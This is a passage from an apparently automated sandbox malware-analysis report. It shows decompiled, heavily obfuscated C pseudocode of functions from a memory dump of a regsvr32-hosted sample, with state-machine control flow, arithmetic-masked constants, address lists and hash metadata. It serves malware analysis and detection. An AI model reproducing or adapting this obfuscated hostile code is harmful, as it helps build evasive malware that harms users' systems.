				_v164 = _v164 ^ 0x014b6a45;
				_v64 = 0x492d9e;
				_v64 = _v64 ^ 0x2124760e;
				_v64 = _v64 ^ 0x216a5ba9;
				_v132 = 0x711783;
				_v132 = _v132 | 0x71acd4bd;
				_v132 = _v132 + 0x97cf;
				_v132 = _v132 ^ 0x71fa50e2;
				_v152 = 0xb0a3b1;
				_v152 = _v152 ^ 0xa6c9b18c;
				_t475 = 0x5e;
				_v152 = _v152 / _t475;
				_v152 = _v152 / _t475;
				_v152 = _v152 ^ 0x0003c09f;
				_v136 = 0xe5fa51;
				_v136 = _v136 + 0xde7e;
				_v136 = _v136 + 0xffffe7ef;
				_v136 = _v136 ^ 0x00ec445b;
				_t519 = _v12;
				while(1) {
					L1:
					_t442 = _v144;
					while(1) {
						L2:
						while(1) {
							L3:
							_t476 = _v160;
							while(1) {
								L4:
								_t531 = _t522 - 0x93283d2;
								if(_t531 > 0) {
									break;
								}
								if(_t531 == 0) {
									return E040F2B09(_v132, _t464, _v152, _v136);
								}
								if(_t522 == 0x6c245) {
									_push( &_v12);
									_push(_t464);
									_push(_t476);
									_push(_v68);
									_push(_v172);
									_push(_v120);
									_push(_v80);
									_push(_t476);
									_push(_v196);
									_push(_t476);
									_push(_v112);
									_push(_v88);
									_push(_v16);
									_t450 = E040DFA95( &_v8, _v24);
									_t528 = _t528 - 0xc + 0x40;
									if(_t450 == 0) {
										L25:
										_t522 = 0x635125b;
										while(1) {
											L1:
											_t442 = _v144;
											goto L2;
										}
									} else {
										_t452 = E040DDC1B( &_v8);
										_t522 = 0x4f2b403;
										_t442 = _v12 * 0x2c + _t464;
										_v144 = _t442;
										_t519 =  >=  ? _t464 : (_t452 & 0x0000001f) * 0x2c + _t464;
										goto L2;
									}
									L34:
								} else {
									if(_t522 == 0x4f2b403) {
										_t476 = E040DEE62(_v148, _v16, _v48, _v20, _v128, _v56,  *_t519);
										_t528 =  &(_t528[5]);
										_t442 = _v144;
										_v160 = _t476;
										_t511 = 0xe34a72e;
										_t522 =  !=  ? 0xe34a72e : 0xced26bb;
										continue;
									} else {
										if(_t522 == 0x635125b) {
											E040F2B09(_v180, _t526, _v164, _v64);
											_t522 = 0x93283d2;
											while(1) {
												L1:
												_t442 = _v144;
												goto L2;
											}
										} else {
											if(_t522 == 0x63dbfd2) {
												_t522 = 0x8a8e175;
												continue;
											} else {
												if(_t522 != 0x8a8e175) {
													L30:
													if(_t522 != 0xfb7e38f) {
														_t442 = _v144;
														goto L3;
													}
												} else {
													_push(_t476);
													_push(_t476);
													_t442 = E040DC5D8(0x20000);
													_t464 = _t442;
													_t528 =  &(_t528[3]);
													if(_t464 != 0) {
														_t522 = 0x965da6a;
														while(1) {
															L1:
															_t442 = _v144;
															L2:
															L3:
															_t476 = _v160;
															goto L4;
														}
													}
												}
											}
										}
									}
								}
								L33:
								return _t442;
								goto L34;
							}
							if(_t522 == 0x965da6a) {
								_push(_t476);
								_push(_t476);
								_t442 = E040DC5D8(0x2000);
								_t526 = _t442;
								_t528 =  &(_t528[3]);
								if(_t442 == 0) {
									_t522 = 0x93283d2;
									goto L29;
								} else {
									_t522 = 0x6c245;
									goto L1;
								}
							} else {
								if(_t522 == 0xbf0ab43) {
									E040DC3A7(_v100, _a8, _v108, _v184, _t526, _v36, _v44);
									_t528 =  &(_t528[5]);
									goto L25;
								} else {
									if(_t522 == 0xced26bb) {
										_t519 = _t519 + 0x2c;
										asm("sbb esi, esi");
										_t522 = (_t522 & 0xfebda1a8) + 0x635125b;
										goto L4;
									} else {
										if(_t522 == _t511) {
											E040EFD4E(_v124, _v140, _v32, _v28,  &_v4, _v72, _t476, _v104, _t526);
											_t522 =  !=  ? 0xbf0ab43 : 0xced26bb;
											_t442 = E040D3046(_v52, _v192, _v60, _v160, _v116);
											_t528 =  &(_t528[0xb]);
											L29:
											_t511 = 0xe34a72e;
										}
										goto L30;
									}
								}
							}
							goto L33;
						}
					}
				}
			}

0x040eb261
0x040eb26a
0x040eb271
0x040eb278
0x040eb279
0x040eb27a
0x040eb27f
0x040eb287
0x040eb28a
0x040eb294
0x040eb29c
0x040eb29e
0x040eb2a6
0x040eb2a8
0x040eb2b0
0x040eb2b5
0x040eb2ba
0x040eb2bf
0x040eb2c4
0x040eb2d9
0x040eb2dc
0x040eb2e3
0x040eb2ee
0x040eb2fb
0x040eb2ff
0x040eb307
0x040eb30f
0x040eb317
0x040eb31f
0x040eb324
0x040eb32c
0x040eb334
0x040eb33c
0x040eb352
0x040eb359
0x040eb364
0x040eb36f
0x040eb377
0x040eb37c
0x040eb384
0x040eb38c
0x040eb394
0x040eb399
0x040eb3a5
0x040eb3a8
0x040eb3ac
0x040eb3b4
0x040eb3bf
0x040eb3ca
0x040eb3d5
0x040eb3e0
0x040eb3e8
0x040eb3f0
0x040eb3f8
0x040eb400
0x040eb40d
0x040eb411
0x040eb419
0x040eb421
0x040eb429
0x040eb434
0x040eb43f
0x040eb44a
0x040eb452
0x040eb457
0x040eb45f
0x040eb469
0x040eb471
0x040eb479
0x040eb481
0x040eb489
0x040eb497
0x040eb49c
0x040eb4a2
0x040eb4af
0x040eb4b2
0x040eb4b6
0x040eb4be
0x040eb4c9
0x040eb4dc
0x040eb4e3
0x040eb4ee
0x040eb4f6
0x040eb4fb
0x040eb503
0x040eb50b
0x040eb513
0x040eb518
0x040eb51c
0x040eb524
0x040eb528
0x040eb52d
0x040eb535
0x040eb540
0x040eb54b
0x040eb553
0x040eb55e
0x040eb569
0x040eb571
0x040eb57c
0x040eb584
0x040eb58e
0x040eb591
0x040eb595
0x040eb59d
0x040eb5a5
0x040eb5b0
0x040eb5bb
0x040eb5c6
0x040eb5d9
0x040eb5e0
0x040eb5eb
0x040eb5fb
0x040eb5ff
0x040eb607
0x040eb60f
0x040eb61b
0x040eb61e
0x040eb627
0x040eb62b
0x040eb633
0x040eb63b
0x040eb640
0x040eb648
0x040eb650
0x040eb65b
0x040eb663
0x040eb670
0x040eb67b
0x040eb683
0x040eb68e
0x040eb6a3
0x040eb6a6
0x040eb6ad
0x040eb6b8
0x040eb6c3
0x040eb6d9
0x040eb6e0
0x040eb6eb
0x040eb6f3
0x040eb6fb
0x040eb704
0x040eb709
0x040eb70f
0x040eb717
0x040eb722
0x040eb72d
0x040eb738
0x040eb740
0x040eb745
0x040eb74d
0x040eb755
0x040eb75d
0x040eb762
0x040eb76a
0x040eb772
0x040eb77a
0x040eb782
0x040eb78a
0x040eb792
0x040eb79a
0x040eb7a5
0x040eb7b0
0x040eb7bb
0x040eb7c6
0x040eb7ce
0x040eb7d9
0x040eb7e1
0x040eb7e9
0x040eb7f3
0x040eb7f6
0x040eb7fa
0x040eb802
0x040eb80a
0x040eb80f
0x040eb81f
0x040eb823
0x040eb82b
0x040eb836
0x040eb841
0x040eb84c
0x040eb854
0x040eb85c
0x040eb864
0x040eb86c
0x040eb874
0x040eb880
0x040eb883
0x040eb88f
0x040eb893
0x040eb89b
0x040eb8a3
0x040eb8ab
0x040eb8b3
0x040eb8bb
0x040eb8c2
0x040eb8c2
0x040eb8c2
0x040eb8c6
0x040eb8c6
0x040eb8cb
0x040eb8cb
0x040eb8cb
0x040eb8cf
0x040eb8cf
0x040eb8cf
0x040eb8d5
0x00000000
0x00000000
0x040eb8db
0x00000000
0x040ebb8a
0x040eb8e7
0x040eb9c3
0x040eb9c4
0x040eb9c5
0x040eb9c6
0x040eb9cd
0x040eb9d1
0x040eb9d5
0x040eb9dc
0x040eb9dd
0x040eb9e1
0x040eb9e2
0x040eb9f3
0x040eba01
0x040eba08
0x040eba0d
0x040eba12
0x040ebb1f
0x040ebb1f
0x040eb8c2
0x040eb8c2
0x040eb8c2
0x00000000
0x040eb8c2
0x040eba18
0x040eba1f
0x040eba27
0x040eba39
0x040eba3d
0x040eba41
0x00000000
0x040eba41
0x00000000
0x040eb8ed
0x040eb8f3
0x040eb99b
0x040eb99d
0x040eb9a0
0x040eb9ab
0x040eb9af
0x040eb9b4
0x00000000
0x040eb8f5
0x040eb8fb
0x040eb95f
0x040eb966
0x040eb8c2
0x040eb8c2
0x040eb8c2
0x00000000
0x040eb8c2
0x040eb8fd
0x040eb903
0x040eb947
0x00000000
0x040eb905
0x040eb90b
0x040ebb65
0x040ebb6b
0x040ebb6d
0x00000000
0x040ebb6d
0x040eb911
0x040eb924
0x040eb925
0x040eb92b
0x040eb930
0x040eb932
0x040eb937
0x040eb93d
0x040eb8c2
0x040eb8c2
0x040eb8c2
0x040eb8c6
0x040eb8cb
0x040eb8cb
0x00000000
0x040eb8cb
0x040eb8c2
0x040eb937
0x040eb90b
0x040eb903
0x040eb8fb
0x040eb8f3
0x040ebb95
0x040ebb95
0x00000000
0x040ebb95
0x040eba4f
0x040ebb3c
0x040ebb3d
0x040ebb43
0x040ebb48
0x040ebb4a
0x040ebb4f
0x040ebb5b
0x00000000
0x040ebb51
0x040ebb51
0x00000000
0x040ebb51
0x040eba55
0x040eba5b
0x040ebb17
0x040ebb1c
0x00000000
0x040eba61
0x040eba67
0x040ebada
0x040ebadf
0x040ebae7
0x00000000
0x040eba69
0x040eba6b
0x040eba9c
0x040ebac3
0x040ebacd
0x040ebad2
0x040ebb60
0x040ebb60
0x040ebb60
0x00000000
0x040eba6b
0x040eba67
0x040eba5b
0x00000000
0x040eba4f
0x040eb8cb
0x040eb8c6

Strings

E!, xrefs: 040EB6F3
{u, xrefs: 040EB4A2
&-, xrefs: 040EB3E0
bu, xrefs: 040EB6E0
B, xrefs: 040EB6B8
[D, xrefs: 040EB8B3
[7, xrefs: 040EB7E1
s4, xrefs: 040EB513
+V, xrefs: 040EB457

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: s4$&-$+V$E!$[7$[D$bu${u$B
API String ID: 0-2389712741
Opcode ID: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
Instruction ID: cd2eb81b386d45cddef6dd2cd3855ca073ce34e0df93aa02bc6af0878f47ef4f
Opcode Fuzzy Hash: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
Instruction Fuzzy Hash: 4B2213B250C3809FE368CF25C98AA5BBBF1BBC4308F10891DE5D996260D7B19959CF03

Uniqueness

Uniqueness Score: -1.00%

Function 040DC6B8, Relevance: 11.7, Strings: 9, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E040DC6B8() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t478;
				void* _t479;
				intOrPtr _t482;
				intOrPtr _t486;
				signed int _t494;
				intOrPtr* _t497;
				signed int _t501;
				intOrPtr _t502;
				intOrPtr* _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				void* _t513;
				void* _t522;
				void* _t562;
				signed int _t564;
				signed int* _t568;

				_t568 =  &_v1764;
				_v1588 = 0x57daab;
				_v1588 = _v1588 + 0x535a;
				_v1588 = _v1588 ^ 0x00582e2c;
				_v1756 = 0x11011b;
				_v1756 = _v1756 | 0x986fcb94;
				_v1756 = _v1756 + 0xffff0812;
				_v1756 = _v1756 | 0x2bc6aa33;
				_v1756 = _v1756 ^ 0x3bfefbb2;
				_v1652 = 0x5adeab;
				_v1652 = _v1652 + 0xffff93f0;
				_v1652 = _v1652 ^ 0xbf2e951e;
				_v1652 = _v1652 ^ 0xbf74e787;
				_v1668 = 0x1eca4f;
				_v1668 = _v1668 + 0x52c;
				_v1568 = 0;
				_v1668 = _v1668 * 0xb;
				_t562 = 0xbc1c7ad;
				_v1668 = _v1668 ^ 0x0152ea48;
				_v1584 = 0x89d737;
				_v1584 = _v1584 + 0xffff9374;
				_v1584 = _v1584 ^ 0x0082a8e0;
				_v1672 = 0x7da8ac;
				_v1672 = _v1672 >> 0xf;
				_v1672 = _v1672 | 0x438c492a;
				_v1672 = _v1672 ^ 0x438e7d89;
				_v1636 = 0xa2c3bd;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x051ae408;
				_v1720 = 0x328717;
				_v1720 = _v1720 << 0xc;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x9e9a;
				_v1720 = _v1720 ^ 0x2e0b4663;
				_v1760 = 0x4b7b55;
				_t57 =  &_v1760; // 0x4b7b55
				_t504 = 0x6f;
				_v1760 =  *_t57 / _t504;
				_v1760 = _v1760 >> 0xb;
				_t505 = 0x66;
				_t564 = 6;
				_v1760 = _v1760 * 0x46;
				_v1760 = _v1760 ^ 0x00015e15;
				_v1740 = 0xf42b27;
				_v1740 = _v1740 / _t505;
				_t506 = 0x21;
				_v1740 = _v1740 * 0x3b;
				_v1740 = _v1740 / _t564;
				_v1740 = _v1740 ^ 0x00118050;
				_v1680 = 0x69fb04;
				_v1680 = _v1680 / _t506;
				_v1680 = _v1680 + 0x2a45;
				_v1680 = _v1680 ^ 0x000477f2;
				_v1624 = 0xeefab1;
				_v1624 = _v1624 << 0xb;
				_v1624 = _v1624 ^ 0x77d908fd;
				_v1688 = 0x983026;
				_v1688 = _v1688 ^ 0xf9038374;
				_v1688 = _v1688 << 1;
				_v1688 = _v1688 ^ 0xf3384871;
				_v1656 = 0xbd9fd7;
				_v1656 = _v1656 | 0x34570662;
				_v1656 = _v1656 << 0xf;
				_v1656 = _v1656 ^ 0xcff19553;
				_v1724 = 0xb73e9;
				_v1724 = _v1724 + 0xffff2aba;
				_t507 = 0x1b;
				_v1724 = _v1724 * 0x2b;
				_v1724 = _v1724 + 0xffffc5c3;
				_v1724 = _v1724 ^ 0x01cec31d;
				_v1732 = 0xfb07a0;
				_v1732 = _v1732 + 0xfffff0a2;
				_v1732 = _v1732 ^ 0xe8e4881c;
				_v1732 = _v1732 + 0xfffffa8c;
				_v1732 = _v1732 ^ 0xe819b6c9;
				_v1664 = 0x98c4f6;
				_v1664 = _v1664 / _t507;
				_v1664 = _v1664 + 0xffffc9a9;
				_v1664 = _v1664 ^ 0x000722b9;
				_v1704 = 0x7b43f4;
				_v1704 = _v1704 + 0x33bf;
				_v1704 = _v1704 ^ 0xbdcd0236;
				_v1704 = _v1704 ^ 0xbdbcc173;
				_v1600 = 0x907d1c;
				_v1600 = _v1600 >> 0xa;
				_v1600 = _v1600 ^ 0x000f3001;
				_v1608 = 0x549b29;
				_v1608 = _v1608 + 0xffff560f;
				_v1608 = _v1608 ^ 0x005a0ce7;
				_v1648 = 0x53669a;
				_t508 = 0x60;
				_v1648 = _v1648 * 0x53;
				_v1648 = _v1648 * 0x2d;
				_v1648 = _v1648 ^ 0xc0c27601;
				_v1616 = 0xf6b3f;
				_v1616 = _v1616 << 0xf;
				_v1616 = _v1616 ^ 0xb591763f;
				_v1712 = 0xd11a2f;
				_v1712 = _v1712 >> 3;
				_v1712 = _v1712 + 0x34a7;
				_v1712 = _v1712 + 0xffffa6d8;
				_v1712 = _v1712 ^ 0x001715b5;
				_v1744 = 0x782a81;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 >> 3;
				_v1744 = _v1744 * 0x57;
				_v1744 = _v1744 ^ 0x00239f7e;
				_v1728 = 0xdf27c0;
				_v1728 = _v1728 + 0xb655;
				_v1728 = _v1728 >> 0xf;
				_v1728 = _v1728 | 0x1084c50a;
				_v1728 = _v1728 ^ 0x10890bcf;
				_v1612 = 0xd31e5c;
				_v1612 = _v1612 / _t508;
				_v1612 = _v1612 ^ 0x000f28c0;
				_v1640 = 0xad59ab;
				_v1640 = _v1640 ^ 0x540bc483;
				_v1640 = _v1640 ^ 0x54aa6eab;
				_v1596 = 0xfc600e;
				_v1596 = _v1596 << 1;
				_v1596 = _v1596 ^ 0x01f16920;
				_v1676 = 0x70f7b6;
				_v1676 = _v1676 >> 1;
				_v1676 = _v1676 | 0x834faa8e;
				_v1676 = _v1676 ^ 0x837cfefc;
				_v1580 = 0xc67f49;
				_v1580 = _v1580 ^ 0x220388f4;
				_v1580 = _v1580 ^ 0x22cc2a29;
				_v1604 = 0xf53a42;
				_v1604 = _v1604 + 0x1d20;
				_v1604 = _v1604 ^ 0x00fba671;
				_v1764 = 0x3c20a1;
				_v1764 = _v1764 << 0xa;
				_v1764 = _v1764 | 0xcc5879dc;
				_v1764 = _v1764 + 0x7d87;
				_v1764 = _v1764 ^ 0xfcd01767;
				_v1736 = 0xfcd131;
				_v1736 = _v1736 | 0xb098ccc9;
				_v1736 = _v1736 + 0x1f04;
				_v1736 = _v1736 | 0xe0e1c446;
				_v1736 = _v1736 ^ 0xf0fbfa39;
				_v1684 = 0x6ca78a;
				_v1684 = _v1684 >> 0xd;
				_t509 = 0x5d;
				_v1684 = _v1684 / _t509;
				_v1684 = _v1684 ^ 0x00062aae;
				_v1576 = 0x28ea20;
				_t510 = 0x2d;
				_v1576 = _v1576 / _t510;
				_v1576 = _v1576 ^ 0x000e137d;
				_v1632 = 0x34444a;
				_v1632 = _v1632 + 0xb7da;
				_v1632 = _v1632 ^ 0x00330b1f;
				_v1748 = 0x707d69;
				_v1748 = _v1748 << 0xb;
				_v1748 = _v1748 ^ 0xb1536161;
				_v1748 = _v1748 + 0xffff04ff;
				_v1748 = _v1748 ^ 0x32b99598;
				_v1696 = 0x3e2d26;
				_v1696 = _v1696 + 0x9f8b;
				_v1696 = _v1696 + 0xf840;
				_v1696 = _v1696 ^ 0x00305f5f;
				_v1700 = 0x43ad40;
				_t511 = 0x7e;
				_v1700 = _v1700 / _t511;
				_v1700 = _v1700 + 0x17b0;
				_v1700 = _v1700 ^ 0x000023e6;
				_v1628 = 0x615af9;
				_v1628 = _v1628 | 0xc5f525fd;
				_v1628 = _v1628 ^ 0xc5f01915;
				_v1752 = 0xf7a5b1;
				_v1752 = _v1752 | 0xfe49737c;
				_v1752 = _v1752 + 0x9fc0;
				_v1752 = _v1752 ^ 0x9fa1c746;
				_v1752 = _v1752 ^ 0x60a54bb7;
				_v1572 = 0x7bbdbf;
				_t512 = 0xe;
				_v1572 = _v1572 * 0x2d;
				_v1572 = _v1572 ^ 0x15c0521a;
				_v1620 = 0xd84802;
				_v1620 = _v1620 ^ 0x3749a239;
				_v1620 = _v1620 ^ 0x37909643;
				_v1644 = 0xebc394;
				_v1644 = _v1644 << 8;
				_v1644 = _v1644 ^ 0xebca8902;
				_v1692 = 0x3d115c;
				_v1692 = _v1692 ^ 0xaeae6a77;
				_v1692 = _v1692 >> 0x10;
				_v1692 = _v1692 ^ 0x000f7307;
				_v1660 = 0x8a3dcc;
				_v1660 = _v1660 ^ 0x1263d9af;
				_v1660 = _v1660 / _t512;
				_v1660 = _v1660 ^ 0x015f4699;
				_v1592 = 0x64d88c;
				_v1592 = _v1592 ^ 0xc97cb881;
				_v1592 = _v1592 ^ 0xc91c2e76;
				_v1708 = 0x9c1e71;
				_v1708 = _v1708 ^ 0xd16e05af;
				_v1708 = _v1708 | 0x50445732;
				_v1708 = _v1708 << 5;
				_v1708 = _v1708 ^ 0x3ec99884;
				_v1716 = 0xd3e518;
				_v1716 = _v1716 + 0xffff72ee;
				_t501 = _v1568;
				_v1716 = _v1716 / _t564;
				_v1716 = _v1716 << 0xa;
				_v1716 = _v1716 ^ 0x8cea7ffc;
				while(1) {
					L1:
					_t513 = 0x5c;
					while(1) {
						L2:
						_t478 = 0x5243326;
						do {
							L3:
							if(_t562 == 0x22d4857) {
								_push(_v1688);
								_push(_v1624);
								_push(_v1680);
								_t479 = E040EE1F8(0x40d1030, _v1740, __eflags);
								E040D7078( &_v520, __eflags);
								_t482 =  *0x40f6214; // 0x0
								_t486 =  *0x40f6214; // 0x0
								__eflags = _t486 + 0x34;
								E040DF96F(_v1656, _t486 + 0x34, _t486 + 0x34, _t479,  &_v520, _v1724,  &_v1560, _t482 + 0x23c, _v1732, _v1664, _v1704,  &_v1040);
								E040EFECB(_t479, _v1600, _v1608, _v1648, _v1616);
								_t568 =  &(_t568[0x10]);
								_t562 = 0x6f5d8c5;
								goto L19;
							} else {
								if(_t562 == 0x3a11f46) {
									_push(_v1612);
									_push(_v1728);
									_push(_v1744);
									__eflags = E040D2DEA(_v1640,  &_v1564, _v1596, 0x40d10a0, _v1756, _v1676, 0x40d10a0, 0x40d10a0, _v1580, _v1604, 0x40d10a0, 0x40d10a0, _v1652, _v1764, _v1736, _v1684, _v1576, E040EE1F8(0x40d10a0, _v1712, __eflags));
									_t562 =  ==  ? 0x5243326 : 0xbc3e7f;
									E040EFECB(_t490, _v1632, _v1748, _v1696, _v1700);
									_t568 =  &(_t568[0x16]);
									L19:
									_t478 = 0x5243326;
									_t513 = 0x5c;
									goto L20;
								} else {
									if(_t562 == _t478) {
										_t494 = E040E00C5( &_v1560, _v1628, _v1752);
										_pop(_t522);
										_t497 = E040E2CD9(_v1572, _t501,  &_v1560, _t522, _v1564, _v1668, _v1620, 2 + _t494 * 2, _v1644, _v1692, _v1660);
										_t568 =  &(_t568[9]);
										__eflags = _t497;
										_t562 = 0xcd5a5d6;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t562 == 0x6f5d8c5) {
											_t502 =  *0x40f6214; // 0x0
											_t503 = _t502 + 0x23c;
											while(1) {
												__eflags =  *_t503 - _t513;
												if(__eflags == 0) {
													break;
												}
												_t503 = _t503 + 2;
												__eflags = _t503;
											}
											_t501 = _t503 + 2;
											_t562 = 0x3a11f46;
											goto L2;
										} else {
											if(_t562 == 0xbc1c7ad) {
												E040D1A34(_v1584,  &_v1040, _t513, _t513, _v1672, _v1636, _v1720, _t513, _v1588, _v1760);
												_t568 =  &(_t568[8]);
												_t562 = 0x22d4857;
												while(1) {
													L1:
													_t513 = 0x5c;
													L2:
													_t478 = 0x5243326;
													goto L3;
												}
											} else {
												if(_t562 != 0xcd5a5d6) {
													goto L20;
												} else {
													E040D53D0(_v1592, _v1708, _v1716, _v1564);
												}
											}
										}
									}
								}
							}
							L10:
							return _v1568;
							L20:
							__eflags = _t562 - 0xbc3e7f;
						} while (__eflags != 0);
						goto L10;
					}
				}
			}

0x040dc6b8
0x040dc6be
0x040dc6cb
0x040dc6d8
0x040dc6e3
0x040dc6eb
0x040dc6f3
0x040dc6fb
0x040dc703
0x040dc70b
0x040dc713
0x040dc71b
0x040dc723
0x040dc72b
0x040dc733
0x040dc73b
0x040dc74b
0x040dc74f
0x040dc754
0x040dc75c
0x040dc767
0x040dc772
0x040dc77d
0x040dc785
0x040dc78a
0x040dc792
0x040dc79a
0x040dc7a5
0x040dc7ad
0x040dc7b8
0x040dc7c0
0x040dc7c5
0x040dc7ca
0x040dc7d2
0x040dc7da
0x040dc7e2
0x040dc7e8
0x040dc7ed
0x040dc7f3
0x040dc7fd
0x040dc800
0x040dc803
0x040dc807
0x040dc80f
0x040dc81f
0x040dc828
0x040dc829
0x040dc835
0x040dc839
0x040dc841
0x040dc84f
0x040dc853
0x040dc85b
0x040dc863
0x040dc86e
0x040dc876
0x040dc881
0x040dc889
0x040dc891
0x040dc895
0x040dc89f
0x040dc8a7
0x040dc8af
0x040dc8b4
0x040dc8bc
0x040dc8c4
0x040dc8d3
0x040dc8d6
0x040dc8da
0x040dc8e2
0x040dc8ea
0x040dc8f2
0x040dc8fa
0x040dc902
0x040dc90a
0x040dc912
0x040dc922
0x040dc926
0x040dc92e
0x040dc936
0x040dc93e
0x040dc946
0x040dc94e
0x040dc956
0x040dc961
0x040dc969
0x040dc974
0x040dc97f
0x040dc98a
0x040dc995
0x040dc9a8
0x040dc9a9
0x040dc9b8
0x040dc9bf
0x040dc9ca
0x040dc9d5
0x040dc9dd
0x040dc9e8
0x040dc9f0
0x040dc9f5
0x040dc9fd
0x040dca05
0x040dca0d
0x040dca15
0x040dca1a
0x040dca24
0x040dca28
0x040dca30
0x040dca38
0x040dca40
0x040dca45
0x040dca4d
0x040dca55
0x040dca69
0x040dca70
0x040dca7b
0x040dca86
0x040dca91
0x040dca9c
0x040dcaa7
0x040dcaae
0x040dcab9
0x040dcac1
0x040dcac5
0x040dcacd
0x040dcad5
0x040dcae0
0x040dcaeb
0x040dcaf6
0x040dcb03
0x040dcb0e
0x040dcb19
0x040dcb21
0x040dcb26
0x040dcb2e
0x040dcb36
0x040dcb3e
0x040dcb46
0x040dcb4e
0x040dcb56
0x040dcb5e
0x040dcb66
0x040dcb6e
0x040dcb79
0x040dcb7e
0x040dcb84
0x040dcb8c
0x040dcb9e
0x040dcba3
0x040dcbac
0x040dcbb7
0x040dcbc2
0x040dcbcd
0x040dcbd8
0x040dcbe0
0x040dcbe5
0x040dcbed
0x040dcbf5
0x040dcbfd
0x040dcc05
0x040dcc0d
0x040dcc15
0x040dcc1d
0x040dcc29
0x040dcc2e
0x040dcc34
0x040dcc3c
0x040dcc44
0x040dcc4f
0x040dcc5a
0x040dcc65
0x040dcc6d
0x040dcc75
0x040dcc7d
0x040dcc85
0x040dcc8d
0x040dcca0
0x040dcca1
0x040dcca8
0x040dccb3
0x040dccbe
0x040dccc9
0x040dccd4
0x040dccdf
0x040dcce7
0x040dccf2
0x040dccfa
0x040dcd02
0x040dcd07
0x040dcd0f
0x040dcd17
0x040dcd25
0x040dcd29
0x040dcd33
0x040dcd43
0x040dcd4e
0x040dcd59
0x040dcd61
0x040dcd69
0x040dcd71
0x040dcd76
0x040dcd7e
0x040dcd86
0x040dcd94
0x040dcd9b
0x040dcd9f
0x040dcda4
0x040dcdac
0x040dcdac
0x040dcdae
0x040dcdaf
0x040dcdaf
0x040dcdaf
0x040dcdb4
0x040dcdb4
0x040dcdba
0x040dcfa1
0x040dcfaa
0x040dcfb1
0x040dcfb9
0x040dcfc7
0x040dcfe8
0x040dd00e
0x040dd013
0x040dd018
0x040dd03b
0x040dd040
0x040dd043
0x00000000
0x040dcdc0
0x040dcdc2
0x040dcef5
0x040dcf01
0x040dcf05
0x040dcf71
0x040dcf91
0x040dcf94
0x040dcf99
0x040dd048
0x040dd04a
0x040dd04f
0x00000000
0x040dcdc8
0x040dcdca
0x040dce91
0x040dce96
0x040dced5
0x040dcedc
0x040dcedf
0x040dcee1
0x040dcee9
0x00000000
0x040dcdd0
0x040dcdd6
0x040dce5f
0x040dce65
0x040dce70
0x040dce70
0x040dce73
0x00000000
0x00000000
0x040dce6d
0x040dce6d
0x040dce6d
0x040dce75
0x040dce78
0x00000000
0x040dcddc
0x040dcde2
0x040dce4d
0x040dce52
0x040dce55
0x040dcdac
0x040dcdac
0x040dcdae
0x040dcdaf
0x040dcdaf
0x00000000
0x040dcdaf
0x040dcde4
0x040dcdea
0x00000000
0x040dcdf0
0x040dce06
0x040dce0c
0x040dcdea
0x040dcde2
0x040dcdd6
0x040dcdca
0x040dcdc2
0x040dce0d
0x040dce1e
0x040dd050
0x040dd050
0x040dd050
0x00000000
0x040dd05c
0x040dcdaf

Strings

E*, xrefs: 040DC853
(, xrefs: 040DCB8C
i}p, xrefs: 040DCBD8
2WDP, xrefs: 040DCD69
__0, xrefs: 040DCC15
#, xrefs: 040DCC3C
U{K, xrefs: 040DC7E2
JD4, xrefs: 040DCBB7
,.X, xrefs: 040DC6D8

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ($,.X$2WDP$E*$JD4$U{K$__0$i}p$#
API String ID: 0-2449995950
Opcode ID: cbe32e8ded146af6a2ba8d715d90a6855cd3f06f25abaf419ef9fda92a77ae9c
Instruction ID: 0a9cffb4cd57cf1241d7f305d2be17569acc31662630c874ee6718fc1791af8e
Opcode Fuzzy Hash: cbe32e8ded146af6a2ba8d715d90a6855cd3f06f25abaf419ef9fda92a77ae9c
Instruction Fuzzy Hash: CB22217150C3809FE3A8CF61C58AA8BFBE2FBC4358F10891DE19996260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040EE955, Relevance: 11.6, Strings: 9, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E040EE955() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
